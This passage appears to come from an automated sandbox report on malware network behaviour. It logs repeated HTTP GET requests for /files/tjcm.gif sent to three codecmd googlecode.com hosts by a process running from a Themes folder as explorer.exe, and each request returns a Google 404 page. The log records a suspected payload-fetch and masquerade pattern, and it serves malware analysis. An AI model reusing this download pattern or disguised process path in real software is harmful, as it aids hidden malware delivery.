                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:16.021884918 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              138192.168.2.651290173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:16.287919998 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:16.961391926 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:16 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:16.961411953 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              139192.168.2.651291142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:17.386413097 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:18.106931925 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:18 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:18.106982946 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              140192.168.2.65129264.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:18.615623951 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:19.323483944 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:19 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:19.323837996 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              141192.168.2.651293173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:19.704329967 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:20.400818110 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:20 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:20.400845051 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              142192.168.2.651294142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:20.829183102 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:21.675658941 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:21 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:21.676039934 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:11:21.676450968 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              143192.168.2.65129564.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:22.156557083 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:22.832351923 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:22 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:11:22.832469940 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              144192.168.2.651296173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:11:23.514127970 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:11:24.228945971 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:11:24 GMT
